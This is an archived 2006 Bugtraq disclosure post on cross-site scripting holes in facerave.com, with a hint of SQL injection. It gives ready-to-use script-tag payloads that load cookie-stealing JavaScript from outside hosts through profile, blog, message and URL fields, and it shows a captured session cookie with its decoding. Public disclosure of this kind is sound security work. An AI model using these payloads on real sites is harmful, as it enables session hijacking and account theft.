| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 13 Jun 2006 03:10:39 -0000
From: luny@...fucktard/com.securityfocus.com
To: bugtraq@...urityfocus.com
Subject: Facerave.com - XSS & sessions disclosure
Facerave.com
Homepage:
http://www.facerave.com
Effected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
------------------------------------------------------
XSS vuln with cookie disclosure via posting a comment:
No filter evasion needed. for PoC in yourself description box put:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/facerave1.jpg
http://www.youfucktard.com/xsp/facerave2.jpg
-----------------------------------------------------
XSS vuln with cookie disclosure when posting a blog entry:
Same as above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/facerave3.jpg
http://www.youfucktard.com/xsp/facerave4.jpg
Our cookie:
This is remote text via xss.js located at youfucktard.com lang=en; PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9; last_pr=7454
Breaking down the cookie:
PHPSESSID= (Our php session Id on the site)
voted= Base64 encoded. When we decode it we get:
a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6
----------------------------------------------------
XSS Vuln and possible SQL injection on deleting blog id:
http://www.facerave.com/index.php?req=blog&act=del&id=1087">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>
Query error msg:
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454
Screenshot:
http://www.youfucktard.com/xsp/facerave5.jpg
-----------------------------------------------------
Sending a message xss vuln:
Same as above, no filter evasion. in your msg title or subject put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshot:
http://www.youfucktard.com/xsp/facerave6.jpg
------------------------------------------------------
Powered by blists - more mailing lists